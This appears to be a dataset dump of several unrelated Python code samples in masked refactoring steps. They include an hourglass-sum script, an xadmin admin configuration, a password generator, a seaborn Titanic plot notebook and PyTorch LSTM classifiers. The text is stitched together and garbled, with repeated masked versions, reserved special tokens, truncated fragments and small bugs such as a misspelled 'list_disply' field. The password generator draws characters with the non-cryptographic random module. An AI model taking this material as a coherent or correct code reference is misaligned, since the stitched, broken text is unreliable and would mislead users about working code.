"step-3": "<mask token>\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\ndef main():\n sys_in = sys.stdin\n sys_out = sys.stdout\n arr = []\n for _ in range(6):\n temp = list(map(int, sys.stdin.readline().split()))\n arr.append(temp)\n print(get_max_sum(arr))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport math\n\n\ndef get_max_sum(arr):\n max_sum = -math.inf\n for i in range(1, 5):\n for j in range(1, 5):\n temp = arr[i][j] + arr[i - 1][j - 1] + arr[i - 1][j] + arr[i - 1][\n j + 1] + arr[i + 1][j + 1] + arr[i + 1][j] + arr[i + 1][j - 1]\n max_sum = max(max_sum, temp)\n return max_sum\n\n\ndef main():\n sys_in = sys.stdin\n sys_out = sys.stdout\n arr = []\n for _ in range(6):\n temp = list(map(int, sys.stdin.readline().split()))\n arr.append(temp)\n print(get_max_sum(arr))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class BaseMyAdminView(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GlobalSettings(object):
"""
site_title 左上角名称
site_footer 底部名称
menu_style 更改左边样式
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseMyAdminView(object):
"""
enable_themes 启动更改主题
use_bootswatch 启用网上主题
"""
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
"""
site_title 左上角名称
site_footer 底部名称
menu_style 更改左边样式
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseMyAdminView(object):
"""
enable_themes 启动更改主题
use_bootswatch 启用网上主题
"""
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
"""
site_title 左上角名称
site_footer 底部名称
menu_style 更改左边样式
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseMyAdminView)
xadmin.site.register(views.CommAdminView, GlobalSettings)
<|reserved_special_token_1|>
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseMyAdminView(object):
"""
enable_themes 启动更改主题
use_bootswatch 启用网上主题
"""
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
"""
site_title 左上角名称
site_footer 底部名称
menu_style 更改左边样式
"""
site_title = '学习网后台管理系统'
site_footer = '学习网'
menu_style = 'accordion'
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseMyAdminView)
xadmin.site.register(views.CommAdminView, GlobalSettings)
<|reserved_special_token_1|>
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseMyAdminView(object):
'''
enable_themes 启动更改主题
use_bootswatch 启用网上主题
'''
enable_themes = True
use_bootswatch = True
class GlobalSettings(object):
'''
site_title 左上角名称
site_footer 底部名称
menu_style 更改左边样式
'''
site_title = "学习网后台管理系统"
site_footer = "学习网"
menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
list_display = ['email', 'code', 'send_type', 'send_time']
search_fields = ['email', 'code', 'send_type']
list_filter = ['email', 'code', 'send_type', 'send_time']
class BannerAdmin(object):
list_disply = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseMyAdminView)
xadmin.site.register(views.CommAdminView, GlobalSettings)
|
flexible
|
{
"blob_id": "d7b830890400203ee45c9ec59611c0b20ab6bfc7",
"index": 8496,
"step-1": "<mask token>\n\n\nclass BaseMyAdminView(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BaseMyAdminView(object):\n \"\"\"\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n \"\"\"\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BaseMyAdminView(object):\n \"\"\"\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n \"\"\"\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\nxadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)\nxadmin.site.register(Banner, BannerAdmin)\nxadmin.site.register(views.BaseAdminView, BaseMyAdminView)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n",
"step-4": "import xadmin\nfrom xadmin import views\nfrom .models import EmailVerifyRecord, Banner\n\n\nclass BaseMyAdminView(object):\n \"\"\"\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n \"\"\"\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n \"\"\"\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n \"\"\"\n site_title = '学习网后台管理系统'\n site_footer = '学习网'\n menu_style = 'accordion'\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\nxadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)\nxadmin.site.register(Banner, BannerAdmin)\nxadmin.site.register(views.BaseAdminView, BaseMyAdminView)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n",
"step-5": "import xadmin\nfrom xadmin import views\n\nfrom .models import EmailVerifyRecord, Banner\n\n\nclass BaseMyAdminView(object):\n '''\n enable_themes 启动更改主题\n use_bootswatch 启用网上主题\n '''\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object):\n '''\n site_title 左上角名称\n site_footer 底部名称\n menu_style 更改左边样式\n '''\n site_title = \"学习网后台管理系统\"\n site_footer = \"学习网\"\n menu_style = \"accordion\"\n\n\nclass EmailVerifyRecordAdmin(object):\n list_display = ['email', 'code', 'send_type', 'send_time']\n search_fields = ['email', 'code', 'send_type']\n list_filter = ['email', 'code', 'send_type', 'send_time']\n\n\nclass BannerAdmin(object):\n list_disply = ['title', 'image', 'url', 'index', 'add_time']\n search_fields = ['title', 'image', 'url', 'index']\n list_filter = ['title', 'image', 'url', 'index', 'add_time']\n\n\nxadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)\nxadmin.site.register(Banner, BannerAdmin)\nxadmin.site.register(views.BaseAdminView, BaseMyAdminView)\nxadmin.site.register(views.CommAdminView, GlobalSettings)",
"step-ids": [
8,
10,
11,
12,
13
]
}
|
[
8,
10,
11,
12,
13
] |
<|reserved_special_token_0|>
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if getnum < 7:
print('Error 205: Too little characters entered')
print(
'Run again using python passwordgenerator.py, or click the run button on your IDE.'
)
exit()
<|reserved_special_token_0|>
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
getnum = int(input('Pick a number greater than 7: '))
if getnum < 7:
print('Error 205: Too little characters entered')
print(
'Run again using python passwordgenerator.py, or click the run button on your IDE.'
)
exit()
lista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',
'2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',
'//', '\\']
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
<|reserved_special_token_1|>
import random
getnum = int(input('Pick a number greater than 7: '))
if getnum < 7:
print('Error 205: Too little characters entered')
print(
'Run again using python passwordgenerator.py, or click the run button on your IDE.'
)
exit()
lista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',
'2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',
'//', '\\']
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
def passwordagain():
again = input('Do you want to generate another password(y/n)?: ')
if again == 'y':
main(lista, getnum)
elif again == 'n':
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
<|reserved_special_token_1|>
# Importing the random library for random choice.
import random
getnum = int(input("Pick a number greater than 7: "))
# Error checking.
if (getnum < 7):
print("Error 205: Too little characters entered")
print("Run again using python passwordgenerator.py, or click the run button on your IDE.")
exit()
# A list of random things.
lista = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','#', '@', '!', '%','^', '//', '\\']
# Main function takes two params, lista and get num.
def main(lista, getnum):
password = ''
for i in range(0, getnum):
passchar = random.choice(lista)
password = password + passchar
print(password)
passwordagain()
#Password again.
def passwordagain():
again = input("Do you want to generate another password(y/n)?: ")
if (again == 'y'):
main(lista,getnum)
elif(again == 'n'):
exit()
else:
print("Sorry, couldn't understand what you were saying.")
passwordagain()
main(lista, getnum)
|
flexible
|
{
"blob_id": "c40bb410ad68808c2e0cc636820ec6a2ec2739b8",
"index": 4053,
"step-1": "<mask token>\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\n<mask token>\n",
"step-2": "<mask token>\nif getnum < 7:\n print('Error 205: Too little characters entered')\n print(\n 'Run again using python passwordgenerator.py, or click the run button on your IDE.'\n )\n exit()\n<mask token>\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\nmain(lista, getnum)\n",
"step-3": "<mask token>\ngetnum = int(input('Pick a number greater than 7: '))\nif getnum < 7:\n print('Error 205: Too little characters entered')\n print(\n 'Run again using python passwordgenerator.py, or click the run button on your IDE.'\n )\n exit()\nlista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',\n '2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',\n '//', '\\\\']\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\nmain(lista, getnum)\n",
"step-4": "import random\ngetnum = int(input('Pick a number greater than 7: '))\nif getnum < 7:\n print('Error 205: Too little characters entered')\n print(\n 'Run again using python passwordgenerator.py, or click the run button on your IDE.'\n )\n exit()\nlista = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1',\n '2', '3', '4', '5', '6', '7', '8', '9', '0', '#', '@', '!', '%', '^',\n '//', '\\\\']\n\n\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n\n\ndef passwordagain():\n again = input('Do you want to generate another password(y/n)?: ')\n if again == 'y':\n main(lista, getnum)\n elif again == 'n':\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\n\n\nmain(lista, getnum)\n",
"step-5": "# Importing the random library for random choice.\nimport random\ngetnum = int(input(\"Pick a number greater than 7: \"))\n# Error checking.\nif (getnum < 7):\n print(\"Error 205: Too little characters entered\")\n print(\"Run again using python passwordgenerator.py, or click the run button on your IDE.\")\n exit()\n# A list of random things.\nlista = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','#', '@', '!', '%','^', '//', '\\\\']\n# Main function takes two params, lista and get num.\ndef main(lista, getnum):\n password = ''\n for i in range(0, getnum):\n passchar = random.choice(lista)\n password = password + passchar\n print(password)\n passwordagain()\n#Password again.\ndef passwordagain():\n again = input(\"Do you want to generate another password(y/n)?: \")\n if (again == 'y'):\n main(lista,getnum)\n elif(again == 'n'):\n exit()\n else:\n print(\"Sorry, couldn't understand what you were saying.\")\n passwordagain()\nmain(lista, getnum)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sb
import matplotlib as mp
data = pd.read_csv("/Users/stevenbaez/Desktop/train.csv")
# In[2]:
data.head()
# In[3]:
subset = data[['Survived','Age', 'Sex']]
# In[5]:
import numpy as np
import matplotlib
# In[20]:
sb.catplot(x="Age", y="Sex",
hue="Survived", col="Embarked",
notch = False,
palette = "Set2",
data=data, kind="box",
height=4, aspect=.7);
# In[17]:
sb.catplot(x="Age", y="Sex",
hue="Survived", col="Pclass",
notch = True,
palette = "Set2",
data=data, kind="box",
height=4, aspect=.7);
# In[ ]:
|
normal
|
{
"blob_id": "41006ff35299aa72b69c6dc1c71a45b44dca7d6c",
"index": 1184,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndata.head()\n<mask token>\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Embarked', notch=False,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Pclass', notch=True,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\n",
"step-3": "<mask token>\ndata = pd.read_csv('/Users/stevenbaez/Desktop/train.csv')\ndata.head()\nsubset = data[['Survived', 'Age', 'Sex']]\n<mask token>\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Embarked', notch=False,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Pclass', notch=True,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport seaborn as sb\nimport matplotlib as mp\ndata = pd.read_csv('/Users/stevenbaez/Desktop/train.csv')\ndata.head()\nsubset = data[['Survived', 'Age', 'Sex']]\nimport numpy as np\nimport matplotlib\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Embarked', notch=False,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\nsb.catplot(x='Age', y='Sex', hue='Survived', col='Pclass', notch=True,\n palette='Set2', data=data, kind='box', height=4, aspect=0.7)\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sb\nimport matplotlib as mp\n\ndata = pd.read_csv(\"/Users/stevenbaez/Desktop/train.csv\")\n\n\n# In[2]:\n\n\ndata.head()\n\n\n# In[3]:\n\n\nsubset = data[['Survived','Age', 'Sex']]\n\n\n# In[5]:\n\n\nimport numpy as np\nimport matplotlib\n\n\n# In[20]:\n\n\nsb.catplot(x=\"Age\", y=\"Sex\",\n hue=\"Survived\", col=\"Embarked\",\n notch = False,\n palette = \"Set2\",\n data=data, kind=\"box\",\n height=4, aspect=.7);\n\n\n# In[17]:\n\n\nsb.catplot(x=\"Age\", y=\"Sex\",\n hue=\"Survived\", col=\"Pclass\",\n notch = True,\n palette = \"Set2\",\n data=data, kind=\"box\",\n height=4, aspect=.7);\n\n\n# In[ ]:\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class classifier(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class classifier(nn.Module):
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,
embed_weights, bidirectional=False, glove=True, init=True, dropout=0):
super().__init__()
self.bidirectional = bidirectional
if glove:
self.embedding = custom_word_embedding(embed_weights)
else:
self.embedding = nn.Embedding(embed_weights.shape[0],
embed_weights.shape[1])
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,
bidirectional=bidirectional, dropout=dropout, batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
<|reserved_special_token_0|>
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class classifier(nn.Module):
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,
embed_weights, bidirectional=False, glove=True, init=True, dropout=0):
super().__init__()
self.bidirectional = bidirectional
if glove:
self.embedding = custom_word_embedding(embed_weights)
else:
self.embedding = nn.Embedding(embed_weights.shape[0],
embed_weights.shape[1])
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,
bidirectional=bidirectional, dropout=dropout, batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, text, text_lengths=None):
text = text.view(text.size()[1], -1)
embedded = self.embedding(text.long())
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
if self.bidirectional:
hidden = torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)
dense_outputs = self.fc(hidden)
outputs = self.act(dense_outputs)
return outputs
class AT_LSTM(nn.Module):
def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,
output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):
super().__init__()
self.ae = ae
self.at = at
self.embedding_dim = embedding_dim
self.embedding = custom_word_embedding(embed_weights)
self.aspects_embedding = custom_word_embedding(embed_weights)
if self.ae:
self.lstm = nn.LSTM(embedding_dim * 2, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
else:
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=
n_layers, bidirectional=False, dropout=dropout, batch_first
=True)
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.at:
self.attention = Attention(aspect_embedding_dim, hidden_dim)
self.attention.xavier_init()
self.fc = nn.Linear(embedding_dim, output_dim)
nn.init.xavier_normal_(self.fc.weight)
self.act = nn.Softmax(dim=1)
def forward(self, inp, text_lengths=None):
text = inp[0].view(inp[0].size()[1], -1)
categories = inp[1].view(inp[1].size()[1]).long()
embedded = self.embedding(text.long())
if self.ae:
embedded_input_aspect = self.aspects_embedding(categories)
embedded_input_aspect = embedded_input_aspect.view(
embedded_input_aspect.size()[0], 1, self.embedding_dim)
embedded_input_aspect = embedded_input_aspect.repeat(1,
embedded.size()[1], 1)
embedded = torch.cat((embedded, embedded_input_aspect), -1)
embedded = embedded.float().cuda()
packed_output, (hidden, cell) = self.lstm(embedded)
embedded_aspects = self.aspects_embedding(categories)
embedded_aspects = embedded_aspects.float().cuda()
if self.at:
final_hidden = self.attention(embedded, embedded_aspects,
packed_output)
else:
final_hidden = hidden
dense_outputs = self.fc(final_hidden)
outputs = self.act(dense_outputs)
return outputs
<|reserved_special_token_1|>
from custom_layers import custom_word_embedding
from custom_layers import Attention
from utils import load_emb_weights
import torch
from torch import nn
class classifier(nn.Module):
def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers,
embed_weights, bidirectional=False, glove=True, init=True, dropout=0):
super().__init__()
self.bidirectional = bidirectional
if glove:
self.embedding = custom_word_embedding(embed_weights)
else:
self.embedding = nn.Embedding(embed_weights.shape[0],
embed_weights.shape[1])
self.lstm = nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers,
bidirectional=bidirectional, dropout=dropout, batch_first=True)
if init:
for name, param in self.lstm.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal_(param)
if self.bidirectional:
self.fc = nn.Linear(hidden_dim * 2, output_dim)
else:
self.fc = nn.Linear(hidden_dim * 1, output_dim)
if init:
